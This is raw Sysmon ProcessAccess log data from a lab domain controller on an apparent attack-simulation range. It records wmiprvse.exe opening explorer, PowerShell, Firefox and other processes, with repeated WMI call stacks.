16:52:51.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236591Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236590Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236589Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236588Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236587Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236586Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236585Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236584Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236583Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236582Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236581Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236580Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236579Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236578Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236577Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236576Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236575Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236574Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236573Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236572Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 